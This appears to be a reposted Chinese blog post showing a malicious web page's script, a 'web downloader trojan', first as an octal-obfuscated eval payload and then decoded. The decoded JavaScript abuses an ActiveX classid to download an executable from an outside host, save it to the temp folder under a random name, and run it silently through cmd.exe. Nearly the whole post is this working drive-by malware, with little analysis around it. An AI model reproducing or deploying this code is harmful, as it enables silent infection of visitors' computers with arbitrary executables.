又一个网页下载者木马 - 润新知

又一个网页下载者木马

文件: http://xxxx.xxx.xxx/web.htm

<SCRIPT LANGUAGE="JavaScript">
eval("\146\165\156\143\164\151\157\156\40\147\156\50\156\51\40\173\40\166\141\162\40\156\165\155\142\145\162\40\75\40\115\141\164\150\56\162\141\156\144\157\155\50\51\52\156\73\40\162\145\164\165\162\156\40\47\176\164\155\160\47\53\115\141\164\150\56\162\157\165\156\144\50\156\165\155\142\145\162\51\53\47\56\145\170\145\47\73\40\175\40\15\12\164\162\171\40\173\40\15\12\166\141\162\40\155\155\61\75\42\150\164\164\160\72\42\73\15\12\155\155\62\75\42\57\57\42\73\15\12\155\155\63\75\42\167\167\167\56\65\65\144\152\56\156\145\164\57\170\171\56\145\170\145\42\73\15\12\144\154\75\155\155\61\53\155\155\62\53\155\155\63\73\40\15\12\141\61\75\42\157\142\152\145\143\164\42\73\141\62\75\42\143\154\141\163\163\151\144\42\73\15\12\141\63\75\42\143\154\163\151\144\72\102\104\71\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60\55\71\70\63\101\55\60\60\103\60\64\106\103\62\71\105\63\66\42\73\15\12\141\64\75\42\101\144\157\144\142\56\123\164\162\145\141\155\42\73\15\12\146\165\143\153\75\42\123\143\162\151\160\164\151\156\147\56\106\151\154\145\123\171\163\164\145\155\117\142\152\145\143\164\42\73\15\12\144\146\75\50\167\151\156\144\157\167\133\42\144\157\143\165\155\145\156\164\42\135\133\42\143\162\145\141\164\145\105\154\145\155\145\156\164\42\135\50\141\61\51\51\73\40\15\12\144\146\133\42\163\145\164\101\164\164\162\151\142\165\164\145\42\135\50\141\62\54\141\63\51\73\40\15\12\166\141\162\40\170\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\115\151\143\162\157\163\157\146\164\56\130\42\53\42\115\42\53\42\114\42\53\42\110\42\53\42\124\42\53\42\124\42\53\42\120\42\54\42\42\51\73\40\15\12\166\141\162\40\123\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\141\64\54\42\42\51\73\40\123\133\42\164\171\160\145\42\135\75\61\73\40\15\12\170\133\42\117\160\145\156\42\135\50\42\107\105\124\42\54\40\144\154\54\60\51\73\40\15\12\170\133\42\123\145\156\144\42\135\50\51\73\40\15\12\146\156\141\155\145\61\75\147\156\50\61\60\60\60\60\51\73\40\15\12\166\141\162\40\106\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\146\165\143\153\54\42\42\51\73\40\15\12\166\141\162\40\164\155\160\75\106\133\42\107\145\164\123\160\145\143\151\141\154\106\157\154\144\145\162\42\135\50\60\51\73\40\15\12\146\156\141\155\145\61\75\40\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\54\146\156\141\155\145\61\51\73\40\15\12\123\133\42\157\160\145\156\42\135\50\51\73\15\12\123\133\42\127\162\151\164\145\42\135\50\170\56\162\145\163\160\157\156\163\145\102\157\144\171\51\73\40\15\12\123\133\42\123\141\166\145\124\157\106\151\154\145\42\135\50\146\156\141\155\145\61\54\62\51\73\40\15\12\123\133\42\103\154\157\163\145\42\135\50\51\73\40\15\12\166\141\162\40\121\75\144\146\133\42\103\162\145\141\164\145\117\142\152\145\143\164\42\135\50\42\123\150\145\154\154\56\101\160\160\154\151\143\141\164\151\157\156\42\54\42\42\51\73\40\15\12\145\170\160\61\75\106\133\42\102\165\151\154\144\120\141\164\150\42\135\50\164\155\160\53\47\134\134\163\171\163\164\145\155\63\62\47\54\47\143\155\144\56\145\170\145\47\51\73\15\12\121\133\42\123\150\145\154\154\105\170\145\143\165\164\145\42\135\50\145\170\160\61\54\47\40\57\143\40\47\53\146\156\141\155\145\61\54\42\42\54\157\160\145\156\54\60\51\73\40\175\40\143\141\164\143\150\50\151\51\40\173\40\151\75\61\73\40\175")
</SCRIPT>

通过解码后:

function gn(n) { var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe'; }
try {
var mm1="http:";
mm2="//";
mm3="www.55dj.net/xy.exe";
dl=mm1+mm2+mm3;
a1="object";a2="classid";
a3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
a4="Adodb.Stream";
fuck="Scripting.FileSystemObject";
df=(window["document"]["createElement"](a1));
df["setAttribute"](a2,a3);
var x=df["CreateObject"]("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");
var S=df["CreateObject"](a4,""); S["type"]=1;
x["Open"]("GET", dl,0);
x["Send"]();
fname1=gn(10000);
var F=df["CreateObject"](fuck,"");
var tmp=F["GetSpecialFolder"](0);
fname1= F["BuildPath"](tmp,fname1);
S["open"]();
S["Write"](x.responseBody);
S["SaveToFile"](fname1,2);
S["Close"]();
var Q=df["CreateObject"]("Shell.Application","");
exp1=F["BuildPath"](tmp+'\\system32','cmd.exe');
Q["ShellExecute"](exp1,' /c '+fname1,"",open,0); } catch(i) { i=1; }

QQ：273352165 evlon#126.com 转载请注明出处。
相关阅读:
(转载)李开复：我在硅谷看到的最前沿科技趋势
 1019. 数字黑洞 (20)
1018. 锤子剪刀布 (20)
1017. A除以B (20)
1016. 部分A+B (15)
1015. 德才论 (25)
1013. 数素数 (20)
1014. 福尔摩斯的约会 (20)
1012. 数字分类 (20)
1011. A+B和C (15)
原文地址：https://www.cnblogs.com/evlon/p/852817.html

Copyright © 2020-2023 润新知